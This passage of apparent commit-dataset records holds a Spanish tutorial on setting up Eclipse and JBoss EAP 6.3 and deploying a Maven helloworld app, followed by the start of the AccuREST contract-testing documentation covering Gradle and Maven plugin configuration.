carpeta `bin\\` dentro de la carpeta del servidor y lo iniciamos escribiendo `standalone.bat`. Es importante no cerrar la ventana de comandos ya que si lo hacemos el proceso en que se ejectuta el servidor se terminar\u00e1 y \u00e9ste se parar\u00e1. As\u00ed que dejamos la ventana de comandos abierta, aunque s\u00ed podemos minimizarla.\n\nNOTE: Si antes no instalaste los ejemplos del servidor puedes bajarlos ahora en el enlace https:\/\/github.com\/jboss-developer\/jboss-eap-quickstarts\/archive\/6.3.0.GA.zip[jboss-eap-quickstarts-6.3.0.GA.zip]. Otra alternativa es obtener la aplicaci\u00f3n desde Maven a partir del arquetipo `maven-archetype-site-simple`. Puedes consultar el Post anterior para recordar c\u00f3mo lo hicimos.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig035.png[]\n\nAhora abrimos otra consola de comandos y situamos en la carpeta del proyecto web helloworld `C:\\TALLER\\Servidor\\EAP-6.3.0\\jboss-eap-quickstarts-6.3.0.GA\\helloworld\\`.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig040.png[]\n\nDentro de la carpeta del proyecto Maven escribimos el comando `mvn clean install jboss-as:deploy`. Se inicia la bajada de los artefactos de dependencias y plugins necesarios y finalmente el comando se ejecuta. Con una sola l\u00ednea de comando hemos llevado a cabo todo el ciclo de construcci\u00f3n del proyecto incluyendo el despliegue de la aplicaci\u00f3n en nuestro reci\u00e9n instalado servidor. A\u00fan con un proyecto tan simple podemos apreciar aqu\u00ed la potencia de Maven. S\u00ed observamos el comando vemos que hemos ejecutado dos phases y un goal. La primera fase, `clean`, elimina cualquier fichero creado en un ciclo de construcci\u00f3n anterior, la segunda ejecuta todas las fases de ciclo por defecto, incluida la fase `install`, que crea una versi\u00f3n snapshot en nuestro repositorio local. Finalmente el goal `deploy` del plugin de Red Hat `jboss-as` toma el artefacto instalable de la carpeta `target\\` dentro de la carpeta del proyecto y lo despliega en el servidor.\n\nAbrimos un navegador y vamos a la direcci\u00f3n `http:\/\/localhost:8080\/jboss-helloworld` y si todo ha ido bien veremos el conocido mensaje `Hello World!`.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig050.png[]\n\n\u00bfY para desinstalar la aplicaci\u00f3n? Otra \u00fanica linea de comando: `mvn jboss-as:undeploy`. Refrescamos la ventana del navegador para ver el error 404 de recurso no disponible. \n\nEl plugin `jboss-as` es capaz de gestionar desde Maven cualquier operaci\u00f3n contra el servidor JBoss. Para usarlo sobre un proyecto como acabamos de hacer s\u00f3lo es necesario declararlo en la secci\u00f3n `<build>` del fichero `pom.xml`. Otra alternativa es incluir el goal de despliegue en la phase final del ciclo por defecto, la fase install, en el fichero pom.xml, y ejecutar entonces el comando mvn clean install, que ahora s\u00f3lo hace referencia a las dos fases. En el fichero pom.xml tendr\u00edamos que tener lo siguiente:\n\n[source,xml]\n----\n<project>\n ...\n <build>\n ...\n <plugins>\n ...\n <plugin>\n <groupId>org.jboss.as.plugins<\/groupId>\n <artifactId>jboss-as-maven-plugin<\/artifactId>\n <version>7.7.Final<\/version>\n <executions>\n <execution>\n <phase>install<\/phase>\n <goals>\n <goal>deploy<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n <\/plugin>\n ...\n <\/plugins>\n ...\n <\/build>\n...\n<\/project>\n----\n\nParemos el servidor. Como fue arrancado desde una consola de comandos lo paramos cerr\u00e1ndola. Nos vamos a la ventana de la consola y pulsamos `Ctrl + C`. Escribimos `S` si nos pregunta si queremos finalizar el archivo por lotes y escribimos `exit` para cerrar la ventana.\n\nVamos ahora a reemplazar la ventana de comando por nuestro IDE para cargar el proyecto y probarlo. Abrimos Eclipse. Una vez dentro del IDE lo primero que hacemos es asegurarnos de que el JRE que se usar\u00e1 sea el contenido en el JDK instalado y no un JRE p\u00fablico fuera del JDK. Esto es necesario porque Eclipse necesita un JDK, como cualquier herrmienta de desarrollo de este tipo, y no le basta s\u00f3lo con un JRE. Me voy a `Windows > Preferences > Java > Installed JREs` y si el JRE no es el incluido en el JDK lo borramos, a\u00f1adimos el incluido en el JDK y lo marcamos como JRE por defecto.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig051.png[]\n\nNOTE: Si vamos a experimentar con los ejemplos del servidor en Eclipse es aconsejable comprimir antes la carpeta raiz que los contiene y tener as\u00ed una copia de seguridad que nos permita recuperar el contenido de los ficheros originales cuando lo necesitemos.\n\nEl siguiente paso es importar el proyecto a Eclipse. Me voy a `File > Import > Maven > Existing Maven Projects`. Click en `Next` y luego en `Browse...` localizamos la carpeta del proyecto en `C:\\TALLER\\Servidor\\EAP-6.3.0\\jboss-eap-quickstarts-6.3.0.GA\\helloworld\\`.En el recuadro `Projects` se seleccionar\u00e1 autom\u00e1ticamente el fichero POM del proyecto. Pulsamos en `Finish` y se nos pregunta si deseamos que nos muestre el cheatsheet que es el conjunto de notas del proyecto, si contestamos afirmativamente luego podemos cerrarlas.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig052.png[]\n\nArrancamos de nuevo el servidor de forma manual desde la ventana de comandos como hicimos antes. Para desplegar el ejemplo importado en el servidor pulsamos bot\u00f3n derecho sobre el proyecto y `Run As\u2026 > Run Configurations > Maven Build`, y creamos una nueva configuraci\u00f3n de arranque rellenando el campo `Goals` con `clean install jboss-as:deploy`. Pulsamos el bot\u00f3n `Apply` y a continuaci\u00f3n el bot\u00f3n `Run` para que Maven realice el ciclo. En la ventana _Consola_ de Eclipse se puede observar la salida de texto del plugin de Maven durante la ejecuci\u00f3n del ciclo de construcci\u00f3n. \n\nComo antes para comprobar que la aplicaci\u00f3n ha sido desplegada de nuevo vamos al navegador y escribimos la URL `http:\/\/localhost:8080\/jboss-helloworld`.\n\nObservemos como se muestra nuestro proyecto dentro de Eclipse. En la perspectiva inicial por defecto mostrada vemos la estructura del proyecto en un recuadro a la izquierda de la pantalla. Aqu\u00ed podemos usar tres views de Eclipse diferentes: Package Explorer, Project Explorer y Navigator. Esta \u00faltima nos presenta la estructura de directorios del proyecto sin m\u00e1s aderezos y en ocasiones es m\u00e1s limpia y clara. En las otras dos Eclipse aporta informaci\u00f3n adicional en forma de iconos y carpetas extra.\n\nSi nos fijamos en la view Package Explorer o en la Proyect Explorer, si no est\u00e1 abierta lo hacemos en `Window > Show Wiew > Other...`, es probable que observemos un icono de Warning sobre el de proyecto. Vayamos ahora a la pesta\u00f1a `Problems` en la parte inferior de la pantalla para ver a que se debe esto.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig055.png[]\n\nLo que nos dice Eclipse es que nuestro proyecto est\u00e1 configurado, en el fichero POM de Maven, para el JDK 1.6 y en nuestra m\u00e1quina tenemos uno distinto. Si tenemos actualizado el JDK es probable que se trate de la versi\u00f3n 1.8. Veamos qu\u00e9 significan las dos entradas de la figura anterior:\n\n* `maven.compiler.source`: indica al compilador la versi\u00f3n del lenguaje que debe interpretar al leer nuestro c\u00f3digo fuente. Por ejemplo si el valor que fijo para mi proyecto es 1.4 entonces no ser\u00e1 capaz de interpretar una clase gen\u00e9rica, que fue introducida en el JDK 1.5, y obtendremos un error de compilaci\u00f3n si existe alguna. Si por el contrario fijo digamos la versi\u00f3n 1.7 para un c\u00f3digo antiguo, sea de la versi\u00f3n 1.4, entonces tambi\u00e9n puedo obtener un error si por ejemplo en el c\u00f3digo antiguo us\u00e9 la palabra clave _enum_, ya que los enumerados se introducen en la versi\u00f3n 1.5 y en Java 1.7, al ser posterior, saltar\u00eda el error. Esto puede verse en la lista de incompatibilidades de la versi\u00f3n 5.0 de Java respecto de la anterior http:\/\/www.oracle.com\/technetwork\/java\/javase\/compatibility-137462.html[aqu\u00ed].\n\n\n\n","old_contents":"= Montar un entorno de trabajo adecuado (2\/2)\nLa metaweb\n:hp-tags: Eclipse, JBoss, JBoss Tools\n:published_at: 2015-04-15\n\n\n\nEn esta segunda entrada terminaremos de instalar y configurar el software que nos permitir\u00e1 en adelante construir nuestras propias aplicaciones Java EE. Como IDE optamos por Eclipse, por ser el m\u00e1s extendido. El salto de uno a otro IDE no es algo costoso, ni en tiempo de aprendizaje ni en tiempo de adaptaci\u00f3n del proyecto si los gestionamos bajo Maven o Gradle.\n\nUn IDE debe procurar al desarrollador un entorno que le permita ser lo m\u00e1s productivo posible, ocultando la complejidad de las tecnolog\u00edas empleadas tras el c\u00f3digo fuente generado para resolver las tareas de los documentos de dise\u00f1o del proyecto. Un ejemplo lo tenemos cuando creamos un web service, aqu\u00ed el IDE nos generar\u00e1 todas las clases y ficheros necesarios y nosotros s\u00f3lo tendremos que enfocarnos en definir la API e implementar cada operaci\u00f3n.\n\nEn mi experiencia Netbeans es un buen entorno, con muchas ayudas, y maduro en su versi\u00f3n en su versi\u00f3n 8, adem\u00e1s tiene detr\u00e1s a una gran comunidad y a Oracle. Como dato en contra, durante el desarrollo de un proyecto mediano, en la versi\u00f3n 8.0, de cuando en cuando se quedaba \"pensando\" unos segundos. Por otro lado tenemos a JDeveloper, que es el IDE oficial de Oracle, muy potente y una opci\u00f3n recomendable para nuevos proyectos de gran tama\u00f1o, y si desarrollamos contra Oracle, y\/o el servidor Weblogic. Para proyectos Spring est\u00e1 Eclipse STS que ofrece potentes wizards. Si nuestro servidor es JBoss o el nuevo WildFly podemos optar la soluci\u00f3n adoptada aqu\u00ed, Eclipse + JBoss Tools, o directamente por JBoss Developer Studio. La ventaja de optar por Eclipse es que podemos personalizar nuestro entorno instalando los plugins que elijamos. En definitiva tenemos m\u00faltiples opciones y la decisi\u00f3n muchas veces depender\u00e1 de las tecnolog\u00edas que elijamos o nos imponga el tipo de proyecto o el propio cliente.\n\nOk, antes de nada vamos a crear una sencilla estructura de carpetas donde ir guardardo el trabajo, y donde instalar el software. Por ejemplo la siguiente:\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig009.png[]\n\nBajo la carpeta `TALLER` creamos las siguientes:\n\n* `BD`: Para las bases de datos que vayamos instalando: MySQL, Derby, etc.\n* `IDE`: Para la instalaci\u00f3n del IDE Eclipse. Instalad otros si quer\u00e9is echarles un vistazo.\n* `Servidor`: Aqu\u00ed ir\u00e1 nuestro JBoss EAP edici\u00f3n Comunity. Aunque si en el futuro vemos algo particular de Java EE 7 instalaremos WildFly o GlassFish. \n* `Workspace`: Para guardar los proyectos desarrollados en Eclipse.\n\nEl fichero comprimido es simplemente una forma r\u00e1pida de hacer una copia de seguridad del workspace.\n\nPara instalar Eclipse, os aconsejo de nuevo que lo hag\u00e1is en Ingl\u00e9s, vamos a la p\u00e1gina https:\/\/www.eclipse.org\/downloads\/ y elegimos la instalaci\u00f3n para desarrolladores de Java EE.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig010.png[]\n\nBajamos el fichero `.zip`, lo copiamos en la carpeta `c:\\TALLER\\IDE\\` y seleccionamos Extraer aqu\u00ed, no hay programa de instalaci\u00f3n. Entramos en la carpeta de Eclipse y doble click en `eclipse.exe`. Seleccionamos la carpeta `c:\\TALLER\\workspace\\` como espacio de trabajo. El IDE se carga y cerramos la pantalla inicial de bienvenida pulsando en el icono en la esquina arriba a la derecha.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig015.png[]\n\nNOTE: No marqu\u00e9is el check `Use this as the default and do not ask again` para as\u00ed cambiar el workspace si quer\u00e9is en un futuro. Si lo marc\u00e1is pod\u00e9is volver a ver la pantalla de selecci\u00f3n de la carpeta del workspace configur\u00e1ndolo en `Window > Preferences > General > Startup and Shutdown > Workspaces`.\n\nAhora le toca al servidor. Nuestro entorno de trabajo necesita un servidor completo para depurar el c\u00f3digo que estemos desarrollando. Navegamos a la p\u00e1gina oficial del servidor JBoss en http:\/\/www.redhat.com\/en\/technologies\/jboss-middleware\/application-platform y pulsamos el bot\u00f3n `TRY IT NOW` dentro de la pesta\u00f1a `TRY`, seleccionada por defecto.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig020.png[]\n\nEsto nos lleva a la p\u00e1gina del servidor JBoss para desarrolladores.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig022.png[]\n\nElegimos nuestro sistema operativo y pulsamos sobre el enlace del installer. Si no estamos ya logados saltaremos a la p\u00e1gina de introducci\u00f3n de usuario y contrse\u00f1a. Procedemos a la creaci\u00f3n de una cuenta pulsando el enlace `Create Account`.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig025.png[]\n\nDespu\u00e9s de introducir una serie de datos b\u00e1sicos aceptamos los t\u00e9rminos del Programa de Desarrollador de Jboss. Esperamos a que la bajada del fichero acabe. Copiamos el fichero en la carpeta `C:\\TALLER\\Servidor\\` y lo arrancamos escribiendo el comando `java -jar jboss-eap-6.3.0-installer.jar`.\n\nSe iniciar\u00e1 un sencillo wizard de instalaci\u00f3n. Si os aparece un mensaje acerca del Firewall de Windows elegid la opci\u00f3n `Permitir`. A la hora de elegir la carpeta de instalaci\u00f3n seleccionad como antes, `C:\\TALLER\\Servidor\\`. Escribimos luego un nombre de usuario y una contrase\u00f1a. Estas credenciales son las del usuario administrador del servidor, que lo gestionar\u00e1 a trav\u00e9s del navegador usando la Consola de Administraci\u00f3n. Apuntad en un sitio seguro estos datos para no olvidarlos. En la instalaci\u00f3n de este servidor se eligieron las credenciales:\n\n[cols=\"1h,2\", width=\"40\"]\n|===\n|user\n|admin\n\n|password\n|abcd-1234\n|===\n\nEs interesante instalar tambi\u00e9n los ejemplos que trae el servidor. Son varios proyectos Maven que muestran ejemplos sencillos sobre el uso de las diferentes tecnolog\u00edas Java EE incidiendo en las gestionadas desde Red Hat: JPA (Hibernate), CDI (Weld), EJB, JSF, etc. Si abrimos el `pom.xml` de alguno de estos proyectos veremos como se definen de las dependencias en proyectos que se despliegan en el servidor JBoss.\n\nEl wizard contin\u00faa por una serie de pantallas donde dejamos las opciones por defecto, la instalaci\u00f3n finaliza a los pocos segundos. Y ya tenemos instalado un flamante servidor Java EE 6 en local. Podemos finalmente guardar y echar un vistazo al script de instalaci\u00f3n.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig030.png[]\n\nComprobaremos que la instalaci\u00f3n es correcta desplegando la aplicaci\u00f3n web _Hello World!_ localizada en los ejemplos reci\u00e9n instalados. Para arrancar manualmente el servidor abrimos una consola de comandos, vamos a la carpeta `bin\\` dentro de la carpeta del servidor y lo iniciamos escribiendo `standalone.bat`. Es importante no cerrar la ventana de comandos ya que si lo hacemos el proceso en que se ejectuta el servidor se terminar\u00e1 y \u00e9ste se parar\u00e1. As\u00ed que dejamos la ventana de comandos abierta, aunque s\u00ed podemos minimizarla.\n\nNOTE: Si antes no instalaste los ejemplos del servidor puedes bajarlos ahora en el enlace https:\/\/github.com\/jboss-developer\/jboss-eap-quickstarts\/archive\/6.3.0.GA.zip[jboss-eap-quickstarts-6.3.0.GA.zip]. Otra alternativa es obtener la aplicaci\u00f3n desde Maven a partir del arquetipo `maven-archetype-site-simple`. Puedes consultar el Post anterior para recordar c\u00f3mo lo hicimos.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig035.png[]\n\nAhora abrimos otra consola de comandos y situamos en la carpeta del proyecto web helloworld `C:\\TALLER\\Servidor\\EAP-6.3.0\\jboss-eap-quickstarts-6.3.0.GA\\helloworld\\`.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig040.png[]\n\nDentro de la carpeta del proyecto Maven escribimos el comando `mvn clean install jboss-as:deploy`. Se inicia la bajada de los artefactos de dependencias y plugins necesarios y finalmente el comando se ejecuta. Con una sola l\u00ednea de comando hemos llevado a cabo todo el ciclo de construcci\u00f3n del proyecto incluyendo el despliegue de la aplicaci\u00f3n en nuestro reci\u00e9n instalado servidor. A\u00fan con un proyecto tan simple podemos apreciar aqu\u00ed la potencia de Maven. S\u00ed observamos el comando vemos que hemos ejecutado dos phases y un goal. La primera fase, `clean`, elimina cualquier fichero creado en un ciclo de construcci\u00f3n anterior, la segunda ejecuta todas las fases de ciclo por defecto, incluida la fase `install`, que crea una versi\u00f3n snapshot en nuestro repositorio local. Finalmente el goal `deploy` del plugin de Red Hat `jboss-as` toma el artefacto instalable de la carpeta `target\\` dentro de la carpeta del proyecto y lo despliega en el servidor.\n\nAbrimos un navegador y vamos a la direcci\u00f3n `http:\/\/localhost:8080\/jboss-helloworld` y si todo ha ido bien veremos el conocido mensaje `Hello World!`.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig050.png[]\n\n\u00bfY para desinstalar la aplicaci\u00f3n? Otra \u00fanica linea de comando: `mvn jboss-as:undeploy`. Refrescamos la ventana del navegador para ver el error 404 de recurso no disponible. \n\nEl plugin `jboss-as` es capaz de gestionar desde Maven cualquier operaci\u00f3n contra el servidor JBoss. Para usarlo sobre un proyecto como acabamos de hacer s\u00f3lo es necesario declararlo en la secci\u00f3n `<build>` del fichero `pom.xml`. Otra alternativa es incluir el goal de despliegue en la phase final del ciclo por defecto, la fase install, en el fichero pom.xml, y ejecutar entonces el comando mvn clean install, que ahora s\u00f3lo hace referencia a las dos fases. En el fichero pom.xml tendr\u00edamos que tener lo siguiente:\n\n[source,xml]\n----\n<project>\n ...\n <build>\n ...\n <plugins>\n ...\n <plugin>\n <groupId>org.jboss.as.plugins<\/groupId>\n <artifactId>jboss-as-maven-plugin<\/artifactId>\n <version>7.7.Final<\/version>\n <executions>\n <execution>\n <phase>install<\/phase>\n <goals>\n <goal>deploy<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n <\/plugin>\n ...\n <\/plugins>\n ...\n <\/build>\n...\n<\/project>\n----\n\nParemos el servidor. Como fue arrancado desde una consola de comandos lo paramos cerr\u00e1ndola. Nos vamos a la ventana de la consola y pulsamos `Ctrl + C`. Escribimos `S` si nos pregunta si queremos finalizar el archivo por lotes y escribimos `exit` para cerrar la ventana.\n\nVamos ahora a reemplazar la ventana de comando por nuestro IDE para cargar el proyecto y probarlo. Abrimos Eclipse. Una vez dentro del IDE lo primero que hacemos es asegurarnos de que el JRE que se usar\u00e1 sea el contenido en el JDK instalado y no un JRE p\u00fablico fuera del JDK. Esto es necesario porque Eclipse necesita un JDK, como cualquier herrmienta de desarrollo de este tipo, y no le basta s\u00f3lo con un JRE. Me voy a `Windows > Preferences > Java > Installed JREs` y si el JRE no es el incluido en el JDK lo borramos, a\u00f1adimos el incluido en el JDK y lo marcamos como JRE por defecto.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig051.png[]\n\nNOTE: Si vamos a experimentar con los ejemplos del servidor en Eclipse es aconsejable comprimir antes la carpeta raiz que los contiene y tener as\u00ed una copia de seguridad que nos permita recuperar el contenido de los ficheros originales cuando lo necesitemos.\n\nEl siguiente paso es importar el proyecto a Eclipse. Me voy a `File > Import > Maven > Existing Maven Projects`. Click en `Next` y luego en `Browse...` localizamos la carpeta del proyecto en `C:\\TALLER\\Servidor\\EAP-6.3.0\\jboss-eap-quickstarts-6.3.0.GA\\helloworld\\`.En el recuadro `Projects` se seleccionar\u00e1 autom\u00e1ticamente el fichero POM del proyecto. Pulsamos en `Finish` y se nos pregunta si deseamos que nos muestre el cheatsheet que es el conjunto de notas del proyecto, si contestamos afirmativamente luego podemos cerrarlas.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig052.png[]\n\nArrancamos de nuevo el servidor de forma manual desde la ventana de comandos como hicimos antes. Para desplegar el ejemplo importado en el servidor pulsamos bot\u00f3n derecho sobre el proyecto y `Run As\u2026 > Run Configurations > Maven Build`, y creamos una nueva configuraci\u00f3n de arranque rellenando el campo `Goals` con `clean install jboss-as:deploy`. Pulsamos el bot\u00f3n `Apply` y a continuaci\u00f3n el bot\u00f3n `Run` para que Maven realice el ciclo. En la ventana _Consola_ de Eclipse se puede observar la salida de texto del plugin de Maven durante la ejecuci\u00f3n del ciclo de construcci\u00f3n. \n\nComo antes para comprobar que la aplicaci\u00f3n ha sido desplegada de nuevo vamos al navegador y escribimos la URL `http:\/\/localhost:8080\/jboss-helloworld`.\n\nObservemos como se muestra nuestro proyecto dentro de Eclipse. En la perspectiva inicial por defecto mostrada vemos la estructura del proyecto en un recuadro a la izquierda de la pantalla. Aqu\u00ed podemos usar tres views de Eclipse diferentes: Package Explorer, Project Explorer y Navigator. Esta \u00faltima nos presenta la estructura de directorios del proyecto sin m\u00e1s aderezos y en ocasiones es m\u00e1s limpia y clara. En las otras dos Eclipse aporta informaci\u00f3n adicional en forma de iconos y carpetas extra.\n\nSi nos fijamos en la view Package Explorer o en la Proyect Explorer, si no est\u00e1 abierta lo hacemos en `Window > Show Wiew > Other...`, es probable que observemos un icono de Warning sobre el de proyecto. Vayamos ahora a la pesta\u00f1a `Problems` en la parte inferior de la pantalla para ver a que se debe esto.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig055.png[]\n\nLo que nos dice Eclipse es que nuestro proyecto est\u00e1 configurado, en el fichero POM de Maven, para el JDK 1.6 y en nuestra m\u00e1quina tenemos uno distinto. Si tenemos actualizado el JDK es probable que se trate de la versi\u00f3n 1.8. Veamos qu\u00e9 significan las dos entradas de la figura anterior:\n\n* `maven.compiler.source`: indica al compilador la versi\u00f3n del lenguaje que debe interpretar al leer nuestro c\u00f3digo fuente. Por ejemplo si el valor que fijo para mi proyecto es 1.4 entonces no ser\u00e1 capaz de interpretar una clase gen\u00e9rica, que fue introducida en el JDK 1.5, y obtendremos un error de compilaci\u00f3n si existe alguna. Si por el contrario fijo digamos la versi\u00f3n 1.7 para un c\u00f3digo antiguo, sea de la versi\u00f3n 1.4, entonces tambi\u00e9n puedo obtener un error si por ejemplo en el c\u00f3digo antiguo us\u00e9 la palabra clave _enum_, ya que los enumerados se introducen en la versi\u00f3n 1.5 y en Java 1.7, al ser posterior, saltar\u00eda el error. Esto puede verse en la lista de incompatibilidades de la versi\u00f3n 5.0 de Java respecto de la anterior http:\/\/www.oracle.com\/technetwork\/java\/javase\/compatibility-137462.html[aqu\u00ed].\n\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"ff96e235b1f5859df4f287cd997363c4d7cea3c9","subject":"minimal configuration for gradle-spock-mockmvc","message":"minimal configuration for gradle-spock-mockmvc\n","repos":"pfrank13\/spring-cloud-contract,pfrank13\/spring-cloud-contract,spring-cloud\/spring-cloud-contract,dstepanov\/accurest,spring-cloud\/spring-cloud-contract,Codearte\/accurest,dstepanov\/accurest,Codearte\/accurest,spring-cloud\/spring-cloud-contract","old_file":"docs\/src\/docs\/asciidoc\/index.adoc","new_file":"docs\/src\/docs\/asciidoc\/index.adoc","new_contents":"http:\/\/:github-tag: master\n:github-repo: Codearte\/accurest\n:github-raw: http:\/\/raw.github.com\/{github-repo}\/{github-tag}\n:github-code: http:\/\/github.com\/{github-repo}\/tree\/{github-tag}\n:toc: left\n\nWelcome to the AccuREST Wiki!\n\nPlease follow to the Introduction page to start your journey with Consumer Driven Contracts in JVM\n\n# 1. Introduction\n\nJust to make long story short - AccuREST is a tool that enables Consumer Driven Contract (CDC) development of JVM-based applications. It is shipped with __REST Contract Definition Language__ (DSL). Contract definitions are used by AccuREST to produce following resources:\n\n* JSON stub definitions to be used by Wiremock when doing integration testing on the client code (__client tests__). Test code must still be written by hand, test data is produced by AccuREST.\n* Acceptance tests (in Spock) used to verify if server-side implementation of the API is compliant with the contract (__server tests__). Full test is generated by AccuREST.\n\nAccuREST moves TDD to the level of software architecture.\n\n# Why?\n\nThe main purposes of AccuREST are:\n\n - to ensure that WireMock stubs (used when developing the client) are doing exactly what actual server-side implementation will do,\n - to promote ATDD method and Microservices architectural style,\n - to provide a way to publish changes in contracts that are immediately visible on both sides,\n - to generate boilerplate test code used on the server side.\n\n# 2. Using in your project\n\n## Prerequisites\n\n# 2.1. Gradle Project\n\n## Prerequisites\n\nIn order to use Accurest with Wiremock you have to use gradle or maven plugin.\n\n## Add gradle plugin\n\n[source,groovy,indent=0]\n----\nbuildscript {\n\trepositories {\n\t\tmavenCentral()\n\t}\n\tdependencies {\n\t\tclasspath 'io.codearte.accurest:accurest-gradle-plugin:1.0.6'\n\t}\n}\n\napply plugin: 'groovy'\napply plugin: 'accurest'\n\ndependencies {\n\ttestCompile('org.codehaus.groovy:groovy-all:2.4.6')\n\ttestCompile 'org.spockframework:spock-core:1.0-groovy-2.4'\n\ttestCompile 'com.jayway.restassured:spring-mock-mvc:2.9.0' \/\/ needed if you're going to use Spring MockMvc\n}\n----\n\n## Add maven plugin\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <goal>generateTests<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\n\nRead more: https:\/\/github.com\/Codearte\/accurest-maven-plugin[accurest-maven-plugin]\n\n## Add stubs\n\nBy default Accurest is looking for stubs in src\/test\/resources\/stubs directory.\nDirectory containing stub definitions is treated as a class name, and each stub definition is treated as a single test.\nWe assume that it contains at least one directory which will be used as test class name. If there is more than one level of nested directories all except the last one will be used as package name.\nSo with following structure\n\nsrc\/test\/resources\/stubs\/myservice\/shouldCreateUser.groovy\nsrc\/test\/resources\/stubs\/myservice\/shouldReturnUser.groovy\n\nAccurest will create test class `defaultBasePackage.MyService` with two methods\n - shouldCreateUser()\n - shouldReturnUser()\n\n## Run plugin\n\nPlugin registers itself to be invoked before `compileTestGroovy` task. You have nothing to do as long as you want it to be part of your build process. If you just want to generate tests please invoke `generateAccurest` task.\n\n## Configure plugin\n\nTo change default configuration just add `accurest` snippet to your Gradle config\n\n[source,groovy,indent=0]\n----\naccurest {\n\ttestMode = 'MockMvc'\n\tbaseClassForTests = 'org.mycompany.tests'\n\tgeneratedTestSourcesDir = project.file('src\/accurest')\n}\n----\n\n### Configuration options\n\n - **testMode** - defines mode for acceptance tests. By default MockMvc which is based on Spring's MockMvc. It can also be changed to **JaxRsClient** or to **Explicit** for real HTTP calls.\n - **imports** - array with imports that should be included in generated tests (for example ['org.myorg.Matchers']). By default empty array []\n - **staticImports** - array with static imports that should be included in generated tests(for example ['org.myorg.Matchers.*']). By default empty array []\n - **basePackageForTests** - specifies base package for all generated tests. By default set to io.codearte.accurest.tests\n - **baseClassForTests** - base class for generated tests. By default `spock.lang.Specification`\n - **ruleClassForTests** - specifies Rule which should be added to generated test classes.\n - **ignoredFiles** - Ant matcher allowing defining stub files for which processing should be skipped. By default empty array []\n - **contractsDslDir** - directory containing contracts written using the GroovyDSL. By default `$rootDir\/src\/test\/accurest`\n - **generatedTestSourcesDir** - test source directory where tests generated from Groovy DSL should be placed. By default `$buildDir\/generated-test-sources\/accurest`\n - **stubsOutputDir** - dir where the generated Wiremock stubs from Groovy DSL should be placed\n - **targetFramework** - the target test framework to be used; currently Spock and JUnit are supported with Spock being the default framework\n\n## Base class for tests\n\n When using Accurest in default MockMvc you need to create a base specification for all generated acceptance tests. In this class you need to point to endpoint which should be verified.\n\n[source,groovy,indent=0]\n----\npackage org.mycompany.tests\n\nimport org.mycompany.ExampleSpringController\nimport com.jayway.restassured.module.mockmvc.RestAssuredMockMvc\nimport spock.lang.Specification\n\nclass MvcSpec extends Specification {\n def setup() {\n RestAssuredMockMvc.standaloneSetup(new ExampleSpringController())\n }\n}\n----\n\nIn case of using `Explicit` mode, you can use base class to initialize the whole tested app similarly as in regular integration tests. In case of `JAXRSCLIENT` mode this base class should also contain `protected WebTarget webTarget` field, right now the only option to test JAX-RS API is to start a web server.\n\n## Invoking generated tests\n\nTo ensure that provider side is complaint with defined contracts, you need to invoke:\n`.\/gradlew generateAccurest test`\n\n## Accurest on consumer side\n\nIn consumer service you need to configure Accurest plugin in exactly the same way as in case of provider. You need to copy contracts stored in src\/test\/resources\/stubs and generate Wiremock json stubs using: `.\/gradlew generateWireMockClientStubs` command. Note that `stubsOutputDir` option has to be set for stub generation to work.\n\nWhen present, json stubs can be used in consumer automated tests.\n\n[source,groovy,indent=0]\n----\n@ContextConfiguration(loader = SpringApplicationContextLoader, classes = Application)\nclass LoanApplicationServiceSpec extends Specification {\n\n @ClassRule\n @Shared\n WireMockClassRule wireMockRule = new WireMockClassRule()\n\n @Autowired\n LoanApplicationService sut\n\n def 'should successfully apply for loan'() {\n given:\n \tLoanApplication application =\n\t\t\tnew LoanApplication(client: new Client(pesel: '12345678901'), amount: 123.123)\n when:\n\tLoanApplicationResult loanApplication = sut.loanApplication(application)\n then:\n\tloanApplication.loanApplicationStatus == LoanApplicationStatus.LOAN_APPLIED\n\tloanApplication.rejectionReason == null\n }\n}\n----\n\nUnderneath LoanApplication makes a call to FraudDetection service. This request is handled by Wiremock server configured using stubs generated by Accurest.\n\n# 2.2. Using in your Maven 